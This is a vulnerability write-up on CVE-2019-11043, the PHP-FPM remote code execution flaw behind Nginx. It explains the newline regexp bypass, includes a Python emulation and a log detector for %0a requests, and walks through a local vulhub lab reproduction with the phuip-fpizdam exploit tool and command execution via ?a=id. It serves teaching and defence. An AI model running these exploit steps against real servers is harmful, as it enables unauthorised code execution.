Cve-2019-11043 (PHP Remote Code Execution Vulnerability)
2022-07-06 04:54:00 【w01ke】
1. Vulnerability description
CVE-2019-11043 is a remote code execution vulnerability. Servers running Nginx + PHP-FPM with certain specific configurations are affected, and it allows an attacker to execute code remotely.
When a URL containing %0a is sent to such an Nginx + PHP-FPM server, the server returns an error.
The vulnerability can only be triggered with a specific configuration in nginx.conf. That configuration is as follows:
location ~ [^/]\.php(/|$) {
...
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;
...
}
An attacker can use a line break (%0a) to break the regexp of the fastcgi_split_path_info directive. Once the regexp no longer matches, PATH_INFO is empty, and this is what triggers the vulnerability.
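To make the mechanism concrete, the following added example (not part of the original post or of vulhub) emulates the fastcgi_split_path_info regexp from the configuration above in Python and shows why a newline in the decoded URI path leaves PATH_INFO empty; it also includes a small detector that flags access-log lines carrying an encoded newline in a .php request. The log lines are constructed sample data, and the log format is assumed to be the default nginx combined format.

```python
import re

# The fastcgi_split_path_info regexp from the vulnerable location block.
# Python's re behaves like PCRE here: '.' does not match a newline, and '$'
# matches only at the end of the string (or just before a trailing newline).
SPLIT_RE = re.compile(r"^(.+?\.php)(/.*)$")


def split_path_info(uri_path: str):
    """Emulate fastcgi_split_path_info on an already URL-decoded path.

    Returns (fastcgi_script_name, fastcgi_path_info). When the regexp does not
    match, nginx leaves both captures empty; an empty PATH_INFO is exactly the
    condition CVE-2019-11043 needs.
    """
    m = SPLIT_RE.match(uri_path)
    if m is None:
        return ("", "")
    return (m.group(1), m.group(2))


# Detection side: an encoded newline (%0a / %0A) inside the path of a .php
# request is the signature described above and never appears in normal traffic.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
NEWLINE_RE = re.compile(r"%0a", re.IGNORECASE)


def is_suspicious_request(log_line: str) -> bool:
    """True when an nginx access-log line requests a .php path containing %0a."""
    m = REQUEST_RE.search(log_line)
    if m is None:
        return False
    path = m.group(1).split("?", 1)[0]          # ignore the query string
    return ".php" in path.lower() and NEWLINE_RE.search(path) is not None


# Constructed sample log lines (default nginx combined format assumed).
SAMPLE_LOG = [
    '127.0.0.1 - - [06/Jul/2022:04:54:00 +0000] "GET /index.php HTTP/1.1" 200 612',
    '127.0.0.1 - - [06/Jul/2022:04:54:01 +0000] "GET /index.php/a%0Ab.php?x=1 HTTP/1.1" 502 0',
    '127.0.0.1 - - [06/Jul/2022:04:54:02 +0000] "GET /static/app.js HTTP/1.1" 200 1024',
]


def suspicious_lines(lines):
    """Return only the log lines that match the detection rule."""
    return [line for line in lines if is_suspicious_request(line)]


if __name__ == "__main__":
    print(split_path_info("/index.php/foo/bar"))    # ('/index.php', '/foo/bar')
    print(split_path_info("/index.php/a\nb.php"))   # ('', '') -> PATH_INFO empty
    print(suspicious_lines(SAMPLE_LOG))
```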
2. Scope
In an Nginx + PHP-FPM environment with the Nginx configuration above enabled, the following PHP versions are affected by this vulnerability. PHP 5.6 is also affected, but for now it only crashes; there is no remote code execution:
● PHP 7.0
● PHP 7.1
● PHP 7.2
● PHP 7.3
3. Vulnerability reproduction
The vulnerability is reproduced using P牛's vulhub docker environment:
PHP-FPM Remote code execution vulnerability (CVE-2019-11043)
Step 1: Install the docker and golang environments
sudo apt-get install docker docker-compose
sudo apt install golang
Step 2: Build the vulnerable environment
git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2019-11043 && docker-compose up -d
After the environment has started, the default page of the vulnerable environment is visible at http://127.0.0.1:8080/index.php
Step 3: Install the exploit tool
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go get -v && go build
If this fails: the default Go module proxy is proxy.golang.org, which cannot be reached from mainland China.
Switch to a proxy address that is reachable from China, https://goproxy.cn, and re-run the command:
go env -w GOPROXY=https://goproxy.cn
go get -v && go build
Step 4: Exploit
go run . "http://127.0.0.1:8080/index.php"
Then visit http://127.0.0.1/index.php?a=id
Note: because php-fpm starts multiple child (worker) processes, /index.php?a=id may need to be requested several times before the request lands on a poisoned worker.
curl ip.sb is a command commonly used on Linux in China to query the machine's public IP address.
4. Reference links
https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043/README.zh-cn.md
https://github.com/neex/phuip-fpizdam
https://wolke.cn/post/4f87817f.html